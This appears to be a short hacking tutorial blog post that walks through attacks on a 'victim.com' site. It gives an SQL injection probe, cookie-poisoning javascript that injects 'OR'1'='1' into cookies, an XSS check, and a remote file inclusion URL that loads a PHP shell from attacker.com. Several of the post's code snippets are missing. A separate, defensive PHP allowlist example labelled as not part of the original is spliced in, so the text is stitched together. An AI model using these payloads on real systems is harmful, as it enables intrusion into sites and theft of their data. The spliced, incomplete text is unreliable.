Enumeration Website Hacking

1. Check for SQL Injection vulnerabilities
SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is therefore unexpectedly executed as part of the query. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Like this:

http://www.victim.com/news.php?id=1'

If you see a database error in the response, the site is most likely vulnerable.
This is classic, error-based SQL injection. We’ll discuss blind SQL injection another time.

2. Cookie poisoning
Even though most sites nowadays filter this, it wouldn’t kill you to try.
We will do this…with javascript.
It’s really simple, try this in the address bar:

javascript:alert(document.cookie);

In some cases this may spill out your username and password.
This is the part where you try the famous line…

javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");

Similar to SQL injection, you guessed it.

3. Site vulnerable to Cross-Site Scripting (XSS)
XSS and javascript together open up a huge horizon of possibilities and a whole lot of new places to discover.
Check if the site is vulnerable by typing this into a web form field or something similar.

//

If the site is vulnerable, you will get a popup message saying awdwdadwd (yes, this was random).
You can find more detailed articles on XSS on milw0rm or something.

4. Remote File Inclusion (RFI)
RFI, or Remote File Inclusion, is where the attacker tries to inject his own PHP code into your PHP apps…and if he’s successful, he can do whatever he wants on the server.
Ok, so, let’s say we have a website coded in PHP and it uses something like page=page.html to decide which page is to be displayed. The code will look something like this:


What this means is that whatever gets passed to page will get included inside the PHP page. It goes like this:

http://www.victim.com/contact.php?page=http://www.attacker.com/phpshell.txt?

The actual code the webserver is executing looks like this:

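As an added example that is not part of the original post (the file name contact.php, the pages/ directory and the allowlist keys are assumptions), here is the include pattern the post describes in its vulnerable form, beside a hardened version that only ever includes one of a fixed set of local templates:

```php
<?php
// Added example, not the original post's code. Hypothetical contact.php.

// Vulnerable pattern described in the post: whatever arrives in ?page= is
// handed straight to include(). With allow_url_include enabled this fetches
// and executes a remote URL; even with it off, arbitrary local files can
// still be included (local file inclusion).
function renderPageVulnerable(array $query): void
{
    include $query['page'];
}

// Hardened version: the request parameter is only a lookup key into a fixed
// allowlist of local templates, so user input never reaches include() itself.
const PAGE_TEMPLATES = [
    'home'    => __DIR__ . '/pages/home.html',
    'contact' => __DIR__ . '/pages/contact.html',
    'news'    => __DIR__ . '/pages/news.html',
];

// Returns the template path for a known key, or null for anything else
// (missing parameter, URLs, path traversal, unexpected characters).
function resolvePage(?string $page): ?string
{
    if ($page === null || !preg_match('/^[a-z]{1,32}$/', $page)) {
        return null;
    }
    return PAGE_TEMPLATES[$page] ?? null;
}

function renderPageSafe(array $query): void
{
    $path = resolvePage($query['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path; // always one of the fixed paths in PAGE_TEMPLATES
}

renderPageSafe($_GET);
```

As defence in depth, keep allow_url_include set to Off in php.ini (its default), which blocks the remote case even in code that still includes user input directly; the allowlist is what closes the local file inclusion case as well.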
regards

k3nz0

  1. nice article bro ..
